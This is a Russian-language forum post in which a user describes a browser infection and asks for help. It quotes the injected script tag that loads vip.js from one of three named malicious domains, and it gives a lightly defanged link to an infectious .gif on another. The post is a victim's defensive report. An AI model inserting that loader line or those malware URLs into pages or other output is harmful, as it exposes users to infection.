KAV 7.0 после полной проверки говорит что ничего нет.
Атака идет вот с этих адресов, они перехватываются по очереди фаерволом:
sun.ads2008.info
kgb.gbu12.info
web.hyj008.info
Изначально KAV ругался на .gif файл, который почему загружался с одного из перечисленных выше сайтов браузером при просмотре любых страниц.
вот пример: h**p://kgb.gbu12.info/gbu.gif (осторожно, заразен!!)
Потом я заметил что в исходном коде любых открытых страниц самой первой строчкой присутствует java-скрипт вот такого содержания:
<script language="javascript" SRC="h**p://sun.ads2008.info/vip.js"></script>
Во всех браузерах. На всех сайтах. Этот скрипт создавал iframe в верхнем углу страницы и что-то делал в нем.
Сейчас я добавил в hosts следующие строчки:
127.0.0.1 sun.ads2008.info
127.0.0.1 kgb.gbu12.info
127.0.0.1 web.hyj008.info
И пока что новых результатов вирусной активности не заметно, но тем не менее в outpost видно что все сетевые программы постоянно ломятся на эти сайты (скриншот прилагаю).
И прилагаю лог из Kaspersky Lab Tool (не обращайте внимание на другие строчки в hosts, это моё)
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: